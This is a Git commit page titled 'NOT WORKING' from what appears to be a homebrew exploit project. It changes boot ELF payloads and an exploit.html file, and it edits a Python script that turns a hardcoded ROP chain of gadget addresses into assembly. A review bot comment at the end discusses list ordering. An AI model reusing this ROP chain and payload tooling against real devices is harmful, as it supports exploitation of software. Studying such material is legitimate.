NOT WORKING

pull/2/head
Winbagility 2 years ago
parent
commit
e5f1d8658c
4 changed files with 9 additions and 3 deletions
  1. payload/boot.elf (binary)
  2. payload/boot_.elf (binary)
  3. payload/exploit.html (+2 -2)
  4. ropChainToAsm.py (+7 -1)

Binary
payload/boot.elf

Binary
payload/boot_.elf

+2 -2
payload/exploit.html
File diff suppressed because it is too large

+7 -1
ropChainToAsm.py

@@ -10,7 +10,13 @@
# ropchain_appendu32(0x01800000)
# in ropchainBuilder.html
ropChain = ['00000000','010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000000', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', 'FFFF3333', '00000000', '0107DD70', '01035FC8', '01800000', '00000000', 'FFFF2222', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000001', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '01023F88', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010240B0', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '01800000']
ropChainAddresses = ['00000000', '00000001', '010204C8', '01023F88', '010240B0', '01035FC8', '010376C0', '0107DD70', '01080274', '01800000', 'FFFF2222', 'FFFF3333']

#Generate a list of each value used in the ROP chain for optimization purposes
#Cause no need to load the value in multiple times
ropChainAddresses = []
for i in ropChain:
if not i in ropChainAddresses:
ropChainAddresses.append(i)

# Essentially, to avoid reloading the same hardcoded values too many times, load each value to r10 one at a time
# then write it to all the locations it is used for. In some cases it uses r7 or r11 for payload address and size
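Review bot: The loop at `for i in ropChain:` fills `ropChainAddresses` in first-occurrence order ('00000000', '010204C8', '0107DD70', ...), while the literal `ropChainAddresses = [...]` list directly above it is sorted ascending, so any later code that depends on the position of a value in this list will see a different sequence. If the sorted order is what the rest of the script expects, `ropChainAddresses = sorted(set(ropChain))` gives the same twelve values in the same order as the literal (the entries are fixed-width uppercase hex strings, so string sort matches numeric sort). Two smaller points: write the membership test as `if i not in ropChainAddresses:`, and do not leave both the literal assignment and the `ropChainAddresses = []` rebuild in the file, since the first would be dead code. The commit message says "NOT WORKING"; a short comment in the script stating what is known to fail would help the next reader.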
